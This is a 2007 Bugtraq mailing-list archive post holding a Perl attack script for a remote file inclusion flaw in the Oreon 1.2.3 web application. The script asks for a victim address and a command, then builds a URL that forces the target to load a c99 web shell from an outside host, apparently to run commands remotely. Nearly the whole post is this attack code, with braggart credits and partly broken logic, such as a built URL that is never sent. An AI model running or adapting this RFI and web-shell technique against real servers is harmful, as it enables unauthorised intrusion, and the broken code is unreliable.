| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 11 Feb 2007 13:30:16 -0000
From: hotturk@...et.com
To: bugtraq@...urityfocus.com
Subject: Oreon1.2.x Series Exploit Coded
#[ Coded : H0tTurk-]
#[ Author: DrmaxVirus
#[ web app : Oreon1.2.3 Remote File İnclude ]
#[ My Site : WwW.H0tTurk.CoM ]
#[Referance:http://www.milw0rm.com/exploits/3150
#[ Thanx : DrmaxVirus,GencTurk,Madconfig,EnjexioN,TiT,Kurtefendy,LuciferCihan,Arabian-FighterZ,Sawturk,Ayyildiz,OzelHarekatTim f4cked238 ]
$rfi = "index.php?file=";
$path = "/";
$shell = "http://redhat.by.ru/c99.txt?cmd=";
print "Language: English // Turkish\nPlz Select Lang:\n"; $dil = <STDIN>; chop($dil);
if($dil eq "English"){
print "(c) H0tTurk\n";
&ex;
}
elsif($dil eq "Turkce"){
print "H0tTurk\n";
&ex;
}
else {print "Selection Language\n"; exit;}
sub ex{
$not = "Victim is Not Zox.\n" and $not_cmd = "Not Doing xpl.\n"
and $vic = "Shell Adress? with start http:// :" and $thx = "Yeah " and $diz = "Dictionary?:" and $komt = "Command?:"
if $dil eq "English";
$not = "Not Found\n" and $not_cmd = "Error Rfi\n"
and $vic = "Example http:// ile baslayan:" and $diz = "Dizin?: " and $thx = "eyw " and $komt = "Command?:"
if $dil eq "Turkce";
print "$vic";
$victim = <STDIN>;
chop($victim);
print "$diz";
$dizn = <STDIN>;
chop($dizn);
$dizin = $dizn;
$dizin = "/" if !$dizn;
print "$komt";
$cmd = <STDIN>;
chop($cmd);
$cmmd = $cmd;
$cmmd = "dir" if !$cmd;
$site = $victim;
$site = "http://$victim" if !($victim =~ /http/);
$acacaz = "$site$dizin$rfi$shell$cmmd";
print "(c) H0tTurk AyT\n$g3rt: Drmax\n";
sleep 3;
system("start $wait");
}
Powered by blists - more mailing lists